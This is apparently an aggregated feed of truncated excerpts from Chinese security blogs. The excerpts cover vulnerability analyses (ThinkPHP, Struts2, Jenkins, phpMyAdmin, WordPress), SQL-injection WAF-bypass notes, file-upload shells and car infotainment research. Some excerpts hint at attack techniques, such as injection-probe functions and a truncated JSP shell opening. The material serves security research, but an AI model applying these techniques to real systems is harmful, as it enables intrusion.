Source: Keen Security Lab Blog
科恩暑期开源程序设计项目-RSoC(Rizin Summer of Code)是由腾讯安全科恩实验室与国际二进制开源逆向工程框架Rizin联合举办的一场开源程序设计项目,旨在为有能力的高校学生提供大型项目参与机会. 通过线上笔试(micro-tasks)的各大高校参与者将有机会被录用为科恩实验室暑期实习生,以国际开源逆向工程框架Rizin为研究主体,在七月中旬开始以线下的形式进行一场为期三个月的程序设计项目. 期待一个跃跃欲试的你加入科恩大家庭,与小伙伴们一起玩转二进制黑魔法
Source: Keen Security Lab Blog
CCF-腾讯犀牛鸟基金(以下简称犀牛鸟基金)于2013年由腾讯公司和中国计算机学会(CCF)共同发起,致力于面向海内外青年学者搭建产学研合作及学术交流的平台. 8年来,犀牛鸟基金为全球范围内最具创新力的青年学者提供了解产业真实问题,接触业务实际需求的机会,并通过连接青年学者与企业研发团队的产学科研合作,推动双方学术影响力的提升及研究成果的应用落地,为自主研发技术的探索和创新储备能量
Source: Keen Security Lab Blog
雷克萨斯从2017年开始已经为多款车型(包括NX、LS、ES等系列)配备新一代的信息娱乐系统,也被称为AVN视听导航设备. 与一些智能网联车载系统相比,如特斯拉中控系统和宝马ConnectedDrive系统,雷克萨斯AVN系统会显得更加传统一些. 从安全的角度来看,它能够很大程度上降低被潜在的网络安全问题攻击的可能性
Source: Keen Security Lab Blog
腾讯安全科恩实验室正式加入致力于推广开源车载信息娱乐系统(IVI)软件的非营利汽车联盟GENIVI. 作为联盟新成员,科恩将在后续的合作中,输出在智能网联汽车领域安全能力,推动GENIVI联盟在智能网联汽车设计标准、开源软件、系统平台等方面的安全能力建设
Source: Keen Security Lab Blog
在过去的两年里,腾讯科恩实验室对特斯拉汽车的安全性进行了深入的研究并在Black Hat 2017与Black Hat 2018安全会议上两次公开分享了我们的研究成果. 我们的研究成果覆盖了车载系统的多个组件. 我们展示了如何攻入到特斯拉汽车的CID、IC、网关以及自动驾驶模块
Source: Keen Security Lab Blog
前言腾讯安全科恩实验室《Order Matters: Semantic-Aware Neural Networks for Binary Code Similarity Detection》论文入选人工智能领域顶级学术会议AAAI-20. 研究核心是利用AI算法解决大规模二进制程序函数相似性分析的问题,本文将深入对该论文进行解读,完整论文可以通过访问以下链接获取: Order Matters: Semantic-Aware Neu for Binary Code Similarity Detection
Source: Keen Security Lab Blog
一些自己写的文章
Source: chybeta博客
拜读一下奇安信的《蓝队视角下的防御体系突破》,简单做个笔记. XMind: 蓝队视角
Source: chybeta博客
pre-auth RCE in vBulletin 5. x. https://twitter
Source: chybeta博客
CVE-2019-15107:RCE in Webmin <= 1. 920 via password-change 中文:https://xz. aliyun
Source: chybeta博客
Twitter: chybeta
Source: chybeta博客
Twitter: chybeta
Source: chybeta博客
Chinese Edition: Ruby on Rails 路径穿越与任意文件读取漏洞分析 - 【CVE-2019-5418】
Source: chybeta博客
中文版本:chinese edition
Source: chybeta博客
2019年1月11日,ThinkPHP官方发布安全更新,修复了一个GETSHELL漏洞. 现分析如下
Source: chybeta博客
WAScan源码阅读
Source: chybeta博客
phpcms 2008 type. php 前台代码注入getshell漏洞分析
Source: chybeta博客
2018年10月12日,Discuz官方修复了一处XSS漏洞:
Source: chybeta博客
Requests v0. 2. 0 源码阅读
Source: chybeta博客
pip-pop源码阅读
Source: chybeta博客
Destoon 20180827版本 前台getshell
Source: chybeta博客
GitLab远程代码执行漏洞分析 -【CVE-2018-14364】
Source: chybeta博客
【Struts2-代码执行漏洞分析系列】S2-057
Source: chybeta博客
Ruby on Rails 路径穿越与任意文件读取漏洞分析 -【CVE-2018-3760】
Source: chybeta博客
OpenTSDB远程命令执行漏洞分析 -【CVE-2018-12972】
Source: chybeta博客
Jenkins 任意文件读取漏洞复现与分析 - 【CVE-2018-1999002】
Source: chybeta博客
用了很久了,推荐下这个: Wordfence Security 细节自己体验吧,说点别的. WordPress […]
Source: EVILCOS-余弦博客
XSS’OR 开源了. 采用 BSD 开源协议,很宽松,不限制传播与商业化,留下作者版权就好. 在下面 […]
Source: EVILCOS-余弦博客
这是一个在线免费的前端黑工具,目前主要包含 3 大模块: 1. Encode/Decode 加解密模块,包含: […]
Source: EVILCOS-余弦博客
今天凌晨,我们的蜜网系统跳出了个有趣的字符串: zaxa2aq@protonmail. com ProtonMa […]
Source: EVILCOS-余弦博客
新年新气象,这个蠕虫我做了小范围测试,也提交了官方修复,小圈子里做了分享,这里正式对外公布下,出于研究而非破坏 […]
Source: EVILCOS-余弦博客
计划准备出一个PPT专门讲解CSRF里的各种奇技淫巧,除了那些老套的手法之外: https://github. […]
Source: EVILCOS-余弦博客
当代 Web 的 JSON 劫持技巧 http://paper. seebug. org/130/ 猥琐流的家伙居 […]
Source: EVILCOS-余弦博客
Seebug Paper之前收录了三篇文章有些关联性,分别是: 绕过混合内容警告 – 在安全的页面 […]
Source: EVILCOS-余弦博客
《Web前端黑客技术揭秘》这本书2013. 1月开售至今,已经第10次印刷,在安全类书籍中,这种成绩确实超出我们 […]
Source: EVILCOS-余弦博客
说 OAuth2. 0 漏洞/这个协议不安全的人,把头伸过来下,砖头准备好了. Black Hat 的有关 Pa […]
Source: EVILCOS-余弦博客
首发于: https://www. anquanke. com/post/id/98917 引言有点想把标题换成 来骗一波点击
Source: Nearg1e博客
项目地址: https://github. com/neargle/ver-observer 用最著名的文学情感类博客测试一下, 看看效果. 请大家测试的时候请参照这个 视频,自己搭建 django 环境,不要浪费博主的流量,谢谢
Source: Nearg1e博客
关于驭龙HIDS驭龙HIDS (https://github. com/ysrc/yulong-hids) 是一款由 YSRC 开发的入侵检测系统,集异常检测、监控管理为一体,拥有异常行为发现、快速阻断、高级分析等功能,可从多个维度行为信息中发现入侵行为. 当前,驭龙agent主要会收集系统信息,计划任务,存活端口,登录日志,进程信息,服务信息,启动项,用户列表,web路径等信息,其中Windows用户登录信息读取了Windows的EventLog,经历了几个版本,更换了好几个方法,最终成型
Source: Nearg1e博客
这是我用来支持先知和代码审计小密圈活动的文章,首发于: https://xianzhi. aliyun. com/forum/read/2163
Source: Nearg1e博客
更新两篇之前在其他地方发过的文章 1. 关于request merging和其会产生的问题request merging : 浏览器会把多次相同的请求(并非所有请求)合并成一次,以加快资源加载速度. e
Source: Nearg1e博客
更新两篇之前在其他地方发过的文章 sqli地址: https://118. 190. 134
Source: Nearg1e博客
Django官方News&Event在4月4日发布了一个安全更新,修复了两个URL跳转的漏洞,一个是urlparse的锅,另一个来自国内的安全研究员 phithon@长亭,都非常漂亮. 因为有复现Django漏洞的习惯,晚上抽了点时间复现了一下. 有趣的点还挺多
Source: Nearg1e博客
可以先看一下n0r00t的文章的这一篇:https://www. n0tr00t. com/2017/01/09/Chrome-Extensions-Probe
Source: Nearg1e博客
跟着蘑菇老师学前端安全第一弹[二哈] 地址: https://server. n0tr00t. com/n0js/case1
Source: Nearg1e博客
前言前段时间发现较为鸡肋的洞和当时写的文章. 一个存在于Flask框架Debugger页面上的通用XSS,Werkzeug0. 11
Source: Nearg1e博客
读《Code Review For Python-Based Web Apps》(《PythonWebApp代码审计》)做的笔记,正好自己也在写相关的文章:讨论PythonWeb开发中可能会遇到的安全问题,所以就翻译了一下作者原文,省去一些不必要的口水,并添加了一些自己的想法. SQL注入安全的做法: 12stmt = "SELECT * FROM table WHERE id=. "connection
Source: Nearg1e博客
一直以来的一个想法,现在有新的思路的就写出来看看. 自动化Web漏洞扫描器是渗透测试亘古不变的话题. 把当前一直重复的手工劳动和新的思路转化为自动化工具,利用技术和程序实现为自己节省时间是一件非常有趣的事情
Source: Nearg1e博客
前言好久没写文章了,最近一直都是在看文章. 近期写了好几个PythonWeb项目,在实现需求的过程中,一直在思考PythonWeb开发过程中会遇到哪些常见的Web安全问题呢. 这些问题又在什么情况下会被利用者GetShell呢
Source: Nearg1e博客
起因以前曾经在微博上看到过Html5的新特性可以用于新的Web攻击,其中提到文件夹上传可以用于欺骗. 觉得有点意思,后来又看到蘑菇在创宇的官博上面写了一篇博客: https://blog. knownsec
Source: Nearg1e博客
影响: WP Mobile Edition版本低于2. 2. 7有该漏洞
Source: Nearg1e博客
闲聊前一段时间,导师说希望我写一个备份Wooyun公开漏洞信息的爬虫程序,为了避免某些突发情况;写完之后还没爬下来我们去比ISCC,河南的ISCC上网特别麻烦,所以队友君就说“要是有一个离线的漏洞库而且能检索就好了”,于是这事就又到了我头上. 考虑到以下三点:
Source: Nearg1e博客
实验环境: KALI (IN VMWARE) Metasploit (IN KALI) Android 4. 1. 2 Apache2 (IN KALI) 实验步骤:
Source: Nearg1e博客
作者: @Ambulong jQuery-File-Upload 是 Github 上继 jQuery 之后最受关注的 jQuery 项目,该项目最近被披露出一个存在了长达三年之久的任意文件上传漏洞,该漏洞在随后发布的 v9. 22. 2 版本中被修复,但是在 VulnSpy 团队对代码的复查中发现了另外一个严重的命令执行漏洞,该漏洞允许攻击者通过上传恶意的图片文件来执行任意系统命令
Source: Vulnspy博客
Author: @Ambulong jQuery-File-Upload is the second most starred jQuery project on GitHub, after the jQuery framework itself. The project was recently reported to have a three-year-old arbitrary file upload vulnerability that was fixed in the release of v9. 22
Source: Vulnspy博客
作者: @Ambulong WordPress是如今使用最为广泛的一套内容管理系统. 根据 w3tech 统计,全世界大概有30%的网站运行着WordPress程序. 昨日RIPS团队公开了一个Wordpress的任意文件删除漏洞(需要登录),目前该漏洞仍然未修复(2018年06月27日),该漏洞影响 Wordpress 最新版 4
Source: Vulnspy博客
Author: @Ambulong WordPress is the most popular CMS on the web. According to w3tech, it is used by approximately 30% of all websites. This wide adoption makes it an interesting target for cyber criminals
Source: Vulnspy博客
作者: @Ambulong 今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4. 8. 1后台getshell
Source: Vulnspy博客
Author: @Ambulong Security Team ChaMd5 disclose a Local File Inclusion vulnerability in phpMyAdmin latest version 4. 8. 1
Source: Vulnspy博客
Author: @Ambulong phpMyAdmin is a well-known MySQL/MariaDB online management tool, phpMyAdmin team released the version 4. 7. 7 that addresses the CSRF vulnerability found by Barot
Source: Vulnspy博客
作者: Ambulong phpMyAdmin是个知名MySQL/MariaDB在线管理工具,phpMyAdmin团队在4. 7. 7版本中修复了一个危害严重的CSRF漏洞(PMASA-2017-9),攻击者可以通过诱导管理员访问恶意页面,悄无声息地执行任意SQL语句
Source: Vulnspy博客
Author: @Ambulong I found this vulnerability after reading slavco’s post, and reported it to Wordpress Team via Hackerone on Sep. 2nd, 2017. But, unfortunately, WordPress team didn’t pay attention to this report too
Source: Vulnspy博客
作者:@Ambulong 本文将介绍如何绕过Wordpress的meta_key检查,添加字段/栏目名以下划线开头的自定义栏目/字段
Source: Vulnspy博客
作者:@Ambulong 在上一篇文章 Wordpress SQL注入分析(一) 中,我们分析了Wordpress中的prepare函数在什么情况下会产生SQL注入漏洞. 本篇文章将分析Wordpress中的一处SQL注入
Source: Vulnspy博客
作者:@Ambulong Wordpress SQL注入分析(一) Wordpress SQL注入分析(二)
Source: Vulnspy博客
Author: @Ambulong SSRF And URL Related TIPS
Source: Vulnspy博客
Author: @Ambulong Local Privilege Escalation Tips
Source: Vulnspy博客
0x00 前言 命令执行后有关的一些归纳(持续补充). 0x01 基础详情 针对命令执行后对系统做更深入的渗透,常规先判断系统类型,命令是否回显,以及目标系统是否能够出网,即系统类型->是否回显->能否出网. 1
Source: whynot博客
0x00 前言 本来想学二进制来着,java又出了那么多漏洞,身为一个web安全狗,还是学Java web吧,几乎0基础,大牛请跳过. 碰巧工作中遇到实例,就尝试简单分析一下这个(很水的一篇文章四处摘抄,就是想立个flag开个头). 0x01 基础详情 在讲述之前先简单介绍一下java反序列化的一些特征
Source: whynot博客
0x00 前言 对文件上传进行一个总结,如果你还没有看过Upload-labs通关手册,建议先看,本文是对其的一个简单补充,另外本文不对跨域等进行总结,后续会陆续添加. 0x01 通用 1. shell <% out
Source: whynot博客
0x0 前言 0x1 注入点检测 0x2 bypass waf 0x3 自动化 0x0 前言 这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波实战,进行一个简单的总结. 0x1 注入点检测 一般的注入还是很好判断的,特别是基于报错,但有的时候略微有些奇葩的环境,再加上一些乱七八糟 waf,就比较难搞了,这里简单总结了一些方法. 利用数据库独有的一些函数 access asc chr len #access-functions mysql substring substr length mssql char ascii len substring #mssql function str oracle ascii chr length substr upper lower replace(x,old,new) 这些数据库中一个通用的函数就是abs,如果觉得是int型注入不妨先试试2-abs(1),然后结合各类数据库的一些函数来判断是什么数据库的注入,当然对数据库了解越多越好
Source: whynot博客
0x0 前言 0x1 信息探测 0x2 命令执行 0x3 实战 0x0 前言 在乙方做渗透测试的时候,经常会遇到oracle数据库的注入,这里是针对oracle数据库进行sql注入一系列总结,其中绝大大多数知识都是跟着各位大哥或者前辈学来,感谢他们的分享. 测试数据库如下: ORACLE DATABASE 10G ENTERPRISE EDITION RELEASE 10. 2
Source: whynot博客
前段时间看到群友问了这样一个问题: ldap:和rmi:关键字被拦截了,是否还可以进行JNDI注入. 方法很简单,就是使用ldaps,但后来发现很多人并不知道怎么搭建LDAPS服务器,正好CoNote里有这个功能,写篇简单的文章讲讲. 0x01 LDAPs是什么 在Java JNDI注入的过程中,用户传入一个URL,Java会根据URL的scheme来判断具体使用哪个包来处理,这些包的位置在
Source: 离别歌 (Phithon的博客)
虽然离开中国已经快三年了,但是我现在仍然在用国内时候购买的国行iPhone 12手机. 我在《2022年欧洲游记》这篇文章里也提到过,实体sim卡导致我出门旅游很不方便,每次都要提前至少一个月时间在淘宝买到旅游卡,然后海运来新加坡. 如果在Shopee上买,时间虽然短一点,但价格会贵很多
Source: 离别歌 (Phithon的博客)
昨天『代码审计』知识星球里有同学向我提了一个有趣的问题: 简单来说就是,在Java的Nashorn脚本中,如果不允许使用小括号(、)和中括号[、],如何执行任意命令. 0x01 浏览器JavaScript无括号XSS 我们知道,Nashorn脚本本质上是JavaScript,而无括号的XSS Payload其实是一个老问题了. 因为JavaScript在执行函数的时候需要使用括号,所以解决问
Source: 离别歌 (Phithon的博客)
「代码审计」知识星球中@1ue 发表了一篇有趣的文章《探索Java反序列化绕WAF新姿势》,深入研究了一下其中的原理,我发现这是一个对我来说很“新”,但实际上年纪已经很大的Trick. 0x01 UTF-8编码原理 UTF-8是现在最流行的编码方式,它可以将unicode码表里的所有字符,用某种计算方式转换成长度是1到4位字节的字符. 参考这个表格,我们就可以很轻松地将unicode码转换成
Source: 离别歌 (Phithon的博客)
Jenkins 未授权文件读取漏洞(CVE-2024-23897)今天闹得沸沸扬扬,我也来简单分析一下这个漏洞,并看看这个文件读取如何利用. 首先说的是,由于Jenkins存在版本和插件差异,所以利用时可能也有不一样之处,本文内容不一定适用于所有Jenkins server. 我们这里使用Vulhub的环境(2
Source: 离别歌 (Phithon的博客)
前几天在『代码审计』知识星球里发了一个小挑战:https://t. zsxq. com/13bFX1N8F <
Source: 离别歌 (Phithon的博客)
Jumpserver是中国国内公司开发的一个开源项目,在开源堡垒机领域一家独大. 在2023年9月官方集中修复了一系列安全问题,其中涉及到如下安全漏洞: JumpServer 重置密码验证码可被计算推演的漏洞,CVE编号为CVE-2023-42820 JumpServer 重置密码验证码可被暴力破解的漏洞,CVE编号为CVE-2023-43650 JumpServer 认证用户跨目录任意文件
Source: 离别歌 (Phithon的博客)
我与掌机结缘是从初中时代就开始了,但严格意义上来讲,在我的少年时代,我是没有拥有过掌机的. 小时候家里没有给我买过任何游戏机,但我曾拥有过一台学习机——名人Windows CE. 虽然被冠以“学习机”的名义,但实际上这是一台搭载Windows CE系统的掌上电脑(PDA),在2008年那个智能手机还没有出世的年代,我竟拥有了一台跨时代的智能大屏设备
Source: 离别歌 (Phithon的博客)
最近博客后台经常会出现一些来自国外的留言,基本全是一些广告,以推广SEO、推广博客工具的居多,比如这个: 这个情况这几年一直都有,我也一直在给博客增加许多限制,比如IP黑名单、关键词黑名单、增强验证码等,但总有一些漏网之鱼,而且今年特别严重. 我的博客完全是自己开发的,而非Wordpress这类通用程序,理论上应该不会有传统的通用工具能自动绕过验证码进行留言. 所以我想不太通这些工具是怎么做
Source: 离别歌 (Phithon的博客)
TLDR Almost all of Uber’s websites are loading JS file: <a hr
Source: zhchbin博客
This write up is about part of my latest XSS report to Uber@hackerone. Sorry for my poor English first of all, I will try my best to expl
Source: zhchbin博客
背景说明:这个漏洞是 <a href="https://labs. detectify. com/2016/12/15/postmessage-xs
Source: zhchbin博客
案例链接:http://www. wooyun. org/bugs/wooyun-2016-02210
Source: zhchbin博客
案例链接:http://www. wooyun. org/bugs/wooyun-2016-02134
Source: zhchbin博客
前言两个月前的一天,在Hackerone上看了不少报告之后的我跃跃欲试,不自量力地给自己定下一个目标:一定要找一个能够获得Bounty的漏洞. 然
Source: zhchbin博客
案例链接:http://wooyun. org/bugs/wooyun-2010-0216027</
Source: zhchbin博客
案例链接:http://wooyun. org/bugs/wooyun-2016-0204520</
Source: zhchbin博客
前言在知乎的题目和答案中,插入的链接都会变成https://link. zhihu. com/target=xxx的形式进
Source: zhchbin博客
前言这篇文章将介绍WEB网站在接入第三方账号系统:新浪微博进行用户身份验证登录时会遇到的几个问题. 前段时间我在乌云上报了几个与这方面相关的漏洞,
Source: zhchbin博客
前言这是一篇关于HTTP Response Split(CRLF Injection)漏洞的及绕过腾讯WAF导致前端出现XSS的实例分析,个人觉
Source: zhchbin博客
又是一年要结束了,又到了该总结一下过去一年的收获,也许明天会更好吧. 妈蛋,原来去年没有写总结,怪不得觉得有很多事情要写,但时间都对不上. <a href="#Timeline" class="headerlink" title="
Source: zhchbin博客
<link rel="stylesheet" href="http:/
Source: zhchbin博客
在过去的一年多时间里,我很幸运地为两个开源项目贡献了几千行代码. 在node-webkit的提交记录中,我有34个Commits,在Chromium中,用了六个月的时间也提交了30+个Commits,可以说对如何加入开源社区有一点点的自己的看法了. 写这篇博客的目的是为了记录下
Source: zhchbin博客
有这么一句话:想要成为什么样的人,就要和什么样的人在一起. 实际上,你可能连自己想做什么样子的人都不清楚. 我们的生活总会在一定的时间内趋于平淡,每天重复着做着类似的事情,无论你是在上学,上班,或者其他
Source: zhchbin博客
背景今天早上才想起来,自己还欠着一件事情没有做完. 很久在人人上之前看到过这样的一句话: I droppe
Source: zhchbin博客
I will record my status every week within GSoC 2013
Source: zhchbin博客
Share my first failed experience about code contribution to chromium
Source: zhchbin博客
这两个月来接触到一个开源项目:node-webkit(项目地址:Link),也做了一点点小小的Code
Source: zhchbin博客
0x01 攻击场景哈希长度扩展攻击(Hash Length Extension Attacks)用于攻
Source: Klaus
0x00最近看了国外几篇关于模板注入的文章, 自己也在这里加上自己的一些东西总结一下
Source: Klaus
Welcome to Hexo. This is your very first post. Check <a href="https://hexo
Source: Klaus
0-RTT and Forward Secrecy Tue Sep 11 00:43:19 2018 前向保密是一個已經被人熟知的安全特性. 基於密鑰交換的前向安全廣泛存在於各種密碼協議之中,例如 TLS、Signal Protocol、WireGuard. Session based 一般我們所說的前向保密方案是基於會話的,每次會話通過握手產生一個獨立的會話密鑰
Source: quininer
Encrypt on Email 什麼是 ENE. ENE 是一個實驗性質的、設計用於郵件的、端到端End to End加密工具. 它基本上是我設想中的 OpenPGP 2
Source: quininer
如何設計一個壞協議 Wed Jun 13 19:44:31 2018 近幾日看 The 8th BIU Winter School on Cryptography 的 slide, 這期冬令營主要內容是協議設計. 冬令營第二講 Implicitly Authenticated KE Protocols 拋磚引玉, 提出了一個相當簡潔的兩消息隱式帶認證密鑰交換Implicitly Authenticated Key Exchange協議, 後文將稱之爲 BADAKEBasic A-round Diffie-hellman Authenticated Key Exchange. 這是一個相當乾淨的協議,甚至可能大家自己就在實踐中設計過類似的協議
Source: quininer
WebAssembly StackOverflow Mon Apr 30 16:50:47 2018 WebAssembly 是一個設計運行在瀏覽器上的類彙編語言, 藉助它可以令 C / C++ 之類的語言運行在瀏覽器上,以期得到性能提升. 新功能自然會引入新攻擊面,可以預見 C / C++ 上經常出現的緩衝區溢出並不會在 WebAssembly 上消失. 有什麼不同 WebAssembly 同常見的彙編有很多不同的地方,例如 它是一個 Stack Machine 它使用 Linear Memory 指令與數據隔離 … 因爲第三點,WebAssembly 在一定程度上是 Harvard architecture,這爲 WebAssembly 帶來了很大的安全優勢,但棧溢出仍是可能的
Source: quininer
Stratis Sun Apr 15 18:14:39 2018 Stratis 是 redhat 放棄 Btrfs 之後推出的代替品, 使用類似 LVM 的方案來提供有如 btrfs、zfs 般強大的功能. 其實 Stratis 釋出 0. 5 有一段時間了,今次抽出時間來嚐下鮮
Source: quininer
基于serviceWorker的缓存投毒 Sat May 2 20:52:57 2015 前几天才察觉到 Chromium 42 已经支持 Fetch API 了, 鉴于我早就想用 Fetch 代替 Ajax, 所以今天把 ice. js 的$. http部分改用 Fetch 实现了
Source: quininer
Surface Pro 3 Mon Mar 30 17:19:12 2015 事情是這樣的,我買了一臺 Surface Pro 3,並給它裝了 Arch Linux. 關於Windows 用了兩天 Windows 8,其實感覺還不錯,按照之前的想法, 試圖裝上 Cmder 和 msys2 來讓 Windows 上的終端也達到可用狀態. 效果不盡人意, cmder 不知是字體或是什麼問題,Vim 下字符會混亂,有點像不等寬字體,而且還有鍵捕獲不到以及亂碼的奇怪問題 msys2 的包太少,完全不夠用 mingw 不會用= = 一開始 msys2 用 pacman 裝的 Mingw Python 找不到,需要手動把/mingw64/bin加入 PATH 試圖安裝上 yaourt,但是依賴的依賴 yajl 編譯報錯,似乎還要做許多設置 雖然 Windows 的觸屏體驗確實很棒,但是我早有裝 Arch Linux 的想法
Source: quininer
Google-Cloud-Security-Scanner Thu Mar 5 14:12:39 2015 一回来上推就看到个有趣的东西——Google Cloud Security Scanner, 虽然目前只是Beta,主要只有XSS检测和分析功能,不过怎么说也是Google出品. 亲测一番效果一般,可以选择前端测试环境. 有一点比较麻烦,目前只允许扫描自己有权限的Gae应用
Source: quininer
关于expressjs的一个小坑 Tue Dec 9 01:07:53 2014 都知道在PHP里,/. key[arr]=value 会被解析为 array(1) { ["key"]=> array(1) { ["arr"]=> string(5) "value" } } 却一直没注意到expressjs里也会如此, // GET /shoes. order=desc&shoe[color]=blue&shoe[type]=converse req
Source: quininer
Arrietty'sSong Sun Sep 21 17:20:47 2014
Source: quininer
test
Source: JISEC
文章目录 本地复现 0x00 【漏洞预警】ThinkPHP v5. 1. 22版本曝出SQL注入漏洞 近日,Thi […]
Source: JISEC
用户名 @([\u4e00-\u9fa5A-Z0-9a-z. _-]+) 话题 #[\u4e00- […]
Source: JISEC
Author: Orange Tsai(@orange_8361) from DEVCORE Recently […]
Source: JISEC
声明一下:下面的优化方案都是基于 “ Mysql-索引-BTree类型 ” 的 一、EXPLAIN 做MySQ […]
Source: JISEC
简介: Xshell是一款强大,著名的终端模拟软件,被广泛的用于服务器运维和管理,Xshell支持SSH,SF […]
Source: JISEC
其实Struts2代码执行原理很简单, 再来一个golang版的 , 不用怀疑, 我写这么多版本其实就是用来 […]
Source: JISEC
/** * Created by IntelliJ IDEA. * User: jisec. co […]
Source: JISEC
https://github. com/Mofree/SecurityTools/tree/mas […]
Source: JISEC
今天凌晨,安全研究员Nike Zheng在Struts2上发现一个高危漏洞(漏洞编号为CVE-2017-563 […]
Source: JISEC
挺多不错的东西,点点散散记到笔记就不知道跑哪去了. 代码审计 1、全面总结 http://find sec bugs. github
Source: l3m0n
该文被密码保护
Source: l3m0n
该文被密码保护
Source: l3m0n
前言 前阵子我的一位朋友发来一份代码让我帮忙看看. 具体就是所有的jsp文件内容和大小都一样,漏洞挖掘无从下手. 经过分析发现所有的Class都使用了自定义的加密工具加密,经过逆向分析,顺利解密,因而有了此文
Source: Magic_Zero
漏洞原理简介 禅道项目管理系统的鉴权模块存在逻辑设计缺陷,可以允许攻击者利用无须授权的模块去内存中“伪造”一个合法用户,然后利用该用户访问需要授权的模块. 从而调用危险的路由,导致命令执行. 环境搭建 点击下载,然后直接根据版本搜索需要的即可
Source: Magic_Zero
前言 距离上次写博客转眼已过去快三年,“空白”的这三年中也曾遇到很多有趣可成文的东西,但是因各种原因未能在此畅快抒怀. 而在忙中偷闲的时候,也曾反省自己,以免迷失. 回想最初入行安全的时候,全因一本早期的黑客杂志而对漏洞研究有了独特的热情,再后来在Wooyun看过前辈们精彩的漏洞之后更加坚定的将漏洞研究
Source: Magic_Zero
0x00 前言 3月31日的时候Nexus Repository Manager官方发布了CVE-2020-10199,CVE-2020-10204的漏洞公告,两个漏洞均是由Github Secutiry Lab的@pwntester发现的. 本着学习的态度,跟进学习了一下,于是有了此文. 从漏洞的描述
Source: Magic_Zero
0x00 前言 今天早上看到了国内几家安全媒体发了Joomla RCE漏洞的预警,漏洞利用的EXP也在Github公开了. 我大致看了一眼描述,觉得是个挺有意思的漏洞,因此有了这篇分析的文章,其实这个漏洞的分析老外在博客中也写过了,本质上这是一个Session反序列化导致的RCE漏洞,由于Joomla
Source: Magic_Zero
0x00 前言 Java反序列化的漏洞爆发很久了,此前一直想学习一下. 无奈Java体系太过于复杂,单是了解就花了我很久的时间,再加上懒,就一直拖着,今天恰好有空,参考@iswin大佬两年前的分析,我自己跟踪了一下流程,并按自己的想法重写了一下POC,在此做个记录. 0x01 漏洞环境搭建 首先我们需
Source: Magic_Zero
0x00 前言 入职以来好久没有写过文章了,入职的时间里也和师傅们学到了很多,认识了很多的新朋友. 最近因为BlackHat 黑客大会的一个议题,PHP反序列化漏洞利用被挖掘出新的攻击面. 这里本着记录学习的目的,有了这篇文章
Source: Magic_Zero
前言 前段时间,晴天师傅在朋友圈发了一张ThinkPHP 注入的截图. 最近几天忙于找工作的事情,没来得及看. 趁着中午赶紧搭起环境分析一波
Source: Magic_Zero
首先编写这么一个hta的文件: 然后运行: 结果如下: 会弹出计算器来
Source: Magic_Zero
Smarty介绍 smarty是一个php模板引擎,其项目地址:https://github. com/smarty-php/smarty 测试环境搭建 下载:https://github. com/smarty-php/smarty/releases (本案例测试为smarty-3
Source: Magic_Zero
我们接着上篇文章,来继续介绍Maven中几个核心的概念: POM (Project Object Model) 我们首先来看一下,上篇文章做演示的时候生成的pom. xml文件: 在该配置文件中有三个必须写的字段,groupId,artifactId,version. groupId代表组织或者创建团队
Source: Magic_Zero
前言 最近在研究java框架struts2的相关漏洞,然后就去看了官方给出的文档. 在看文档的过程中发现使用到了Apache Maven这个项目管理工具,我在网上搜索了一下,大多数文章都写得不是很系统,容易产生迷惑. 我就自己来根据自己的学习过程,做个记录
Source: Magic_Zero
0x00 前言 最近在学习java的相关漏洞,所以Struts2的漏洞自然是绕不开的. 为了更好的理解漏洞原理,计划把Struts2所有的漏洞自己都做一个复现. 并且自己去实现相关的POC
Source: Magic_Zero
这个漏洞本是2014年时候被人发现的,本着学习的目的,我来做个详细的分析. 漏洞虽然很早了,新版的Drupal甚至已经改变了框架的组织方式. 但是丝毫不影响对于漏洞的分析
Source: Magic_Zero
0x00 前言 今天在Seebug的公众号看到了Typecho的一个前台getshell分析的文章,然后自己也想来学习一下. 保持对行内的关注,了解最新的漏洞很重要. 0x01 什么是反序列化漏洞 如题所说,这是一个反序列化导致的代码执行
Source: Magic_Zero
作为一个学习web安全的菜鸟,前段时间被人问到PHP反序列化相关的问题,以前的博客中是有这样一篇反序列化漏洞的利用文章的. 但是好久过去了,好多的东西已经记得不是很清楚. 所以这里尽可能写一篇详细点的文章来做一下记录
Source: Magic_Zero
元字符: * 星号 它指定前一个字符可以被匹配零次或更多次 匹配a和b之间的字符,如果有,那么继续直到没有为止. 所以它是贪婪匹配. 如果a和b之间有字符,但是不是bcd中的任意一个那么将会停止,取到上次匹配的结果
Source: Magic_Zero
SQLmap是现在搞web人手一个的注入神器,不仅包含了主流数据库的SQL注入检测,而且包含提权以及后渗透模块. 基于python2. x开发而成,使用方便
Source: Magic_Zero
python中的一个十分好用的包管理工具python-pip是我们使用python必不可少的一件工具. 但是在CentOS7安装时候却遇到了一些小问题: 查阅资料以后,原来是因为CentOS官方的源有些时候滞后导致的. 所以我们可以用fedora社区打造的EPEL(http://fedoraprojec
Source: Magic_Zero
这是很早以前学习C时候做过的一个练习题,题目的要求大概是把用户输入的三位数倒序输出,比如说用户输入123,然后程序应该输出的结果是321. 如果遇到用户输入100,那么程序应该输出1. 然后我给扩展一下,这个程序来适应于三位数以上的或者三位数以下的
Source: Magic_Zero
前言 2021年在360搭了一套ID. 4台架环境,本来快要出成果了(拿到了ODIS内网权限,还有ICAS3的root),被安排出差去搭建展示车,后续工
Source: Gorgias
前言 在 2021 年想要碰撞 QNX Hash 发现 hashcat 不支持 QNX 6. 6. 0版本
Source: Gorgias
前言 这个是多年前自己为了方便查阅的写的笔记,记录的是碎片话思路,很乱,没有操作步骤,持续更新. 这里指的固件是从存储芯片提取的原始文件或升级文件. 原始固件逆向的特点 固件文件难以获取 <l
Source: Gorgias
研究过程 最近研究某汽车,遇到一个Win下的软件,用于连接经销商内网. 安装完成,目录有jar文件又有exe文件. 执行start
Source: Gorgias
固件载体 固件 (Firmware), 在港澳台称作韧体, 在手机领域又称作字库. 它位于非易失性存储(Non-Volatile Memory,NVM)中,可以被读写. 在嵌入式领域,最常见的NVM类型是ROM(read-only memory)和Flash
Source: Gorgias
固件提取系列-UBI文件系统提取以及重打包 前言 去年写的,不小心把github仓库弄成私有,Readme没了,重新传了个Readme,觉得有点不好意思. 先把这篇文章放出来吧 UBI(Unsorted Block Image
Source: Gorgias
使用华为E5885L一年多了,对我而言,它不仅是一款完美的4G便携路由器,而且经过改造之后更是一款渗透利器. 尽管这是一款非常美好的产品,但是在安全研究的工作中,还是发现有不少痛点. 但是在使用了GL
